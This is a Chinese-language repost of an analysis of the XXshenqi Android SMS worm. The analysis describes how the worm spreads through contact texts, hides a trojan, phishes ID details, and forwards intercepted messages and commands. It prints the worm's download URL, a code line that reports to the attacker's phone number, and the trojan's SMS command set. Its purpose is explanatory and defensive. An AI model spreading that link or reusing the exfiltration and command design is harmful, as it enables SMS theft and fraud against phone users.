安基網 首頁 電腦 殺毒安全 查看內容

安卓短信蠕蟲木馬分析

2019-4-4 01:28| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 今天從論壇上看到了這款Android短信蠕蟲的信息,于是自己下載了一款研究,看到網上很多報告的md5值不同,不知道是否是變種。接下來就分析一下,這款病毒究竟做了些什么。病毒分為兩個部分,一個是XXshenqi.apk,另一個是com.android.Trogoogle.apk。后者存在于前者解壓文件下的assets目錄中。首先,分 ...

今天從論壇上看到了這款Android短信蠕蟲的信息,于是自己下載了一款研究,看到網上很多報告的md5值不同,不知道是否是變種。接下來就分析一下,這款病毒究竟做了些什么。

病毒分為兩個部分,一個是XXshenqi.apk,另一個是com.android.Trogoogle.apk。后者存在于前者解壓文件下的assets目錄中。首先,分析XXshenqi.apk,安裝至虛擬機上運行。

首先,在初始安裝后,用戶點擊app,會出現安裝另外一個apk的信息:

  1. 入口Activity是WelcomeActivity,在這個Activity中,首先獲取手機中所有的聯系人信息,然后群發一條短信,內容如下:

[聯系人姓名] + "看這個," +"http://cdn.yyupload.com/down/4279193/XXshenqi.apk"

騙取本機聯系人點擊惡意鏈接下載病毒進行傳播。

發送成功后,執行:

SmsManager.getDefault().sendTextMessage("18670259904", null, "XXshenqi 群發鏈接OK", null, null

即向這個號碼反饋執行信息。

開啟一個MainActivity

在這個Activity中,安裝一個com.example.com.android.trogoogle的文件,這個文件存在于xxshenqi.apk解壓后文件的assets目錄下。

安裝木馬后,會自動隱藏圖標。

同時彈出一個登錄框,只不過這個是個幌子,怎么輸入都會出現密碼錯誤或者賬戶不存在,將用戶導入到一個注冊頁面:RegisterActivity中

RegisterActivity真的是注冊頁面嗎?

在這個頁面中,會讓用戶輸入很多信息,比如身份證號以及姓名。

如果點擊了注冊按鈕那么很不幸,你的信息就會發送到黑客的手機上。

至此,xxshenqi.apk的任務基本是完成了,即使用戶卸載也無所謂,因為木馬已經在剛開始就被釋放了。

1.在入口Activity—–MainActivity中木馬執行了隱藏圖標的功能,隨后打開了一個ListenMessageService的服務,在后臺運行。

2.ListenMessageService這個服務里面,首先注冊一個短信數據庫的觀察者,檢測短信數據庫的變化,一旦用戶的短信數據庫發生變化(收到信息或者更新信息),那么觀察者就會執行回調函數執行,首先判斷是否是命令短信,命令短信是用來向木馬發送命令的。如果是平常的短信,就將截獲的短信全部發往黑客手中,值得注意的是木馬還判斷短信是否是淘寶發送的短信,如果是的話就單獨處理。

并且木馬中還有發送偽造短信給用戶的功能,如果是這種短信,木馬就不會截獲或者發送給黑客。

這里還存在的惡意行為是讀取用戶收件發件箱短信,以及手機中的聯系人。

當截獲完短信之后,木馬就又開啟了一個MySendEmailService服務。

3.MySendEmailService這個服務就是給黑客發送電子郵件。

這上面都是一些用到的發送信息包括主機,端口,賬戶名,密碼(有密碼哦~)。。。

4.定義廣播接收者處理接收的命令BroadcastRecvMessage

BroadcastRecvMessage這個類繼承了系統的BroadcastReceiver組件,一旦接收到短信,就會觸發代碼,并判斷指令所要求木馬執行的具體功能。

readmessage 發送郵件命令

sendmessage發送短信命令

test測試命令

makemessage偽造短信命令

sendlink發送連接的命令

當然,這里也做了具體處理,就是判斷是否是普通短信和淘寶網購信息,如果是淘寶信息就加上一個Flag發送,簡直碉堡。

至此,這款病毒究竟做了些啥就基本清楚了,所做的操作也是一般短信木馬的常有功能,包括截獲短信并發送,發送惡意鏈接進行傳播(冒充聯系人發送,更有迷惑性),支持接收指令,以及發送惡意偽造的短信給用戶(冒充聯系人發送,更有迷惑性)等行為,還是比較歹毒的。

Android系統具有優美的開放性的同時,同樣也遭受著各種病毒的侵襲。面對這些病毒,最好的辦法還是不要去一些不正規的應用市場下載,并且注意安裝時認清權限,如果有可以的權限如:讀取系統日志,那么就不要輕易下載。




小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6675530027485889035/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
湖北快3 购买技巧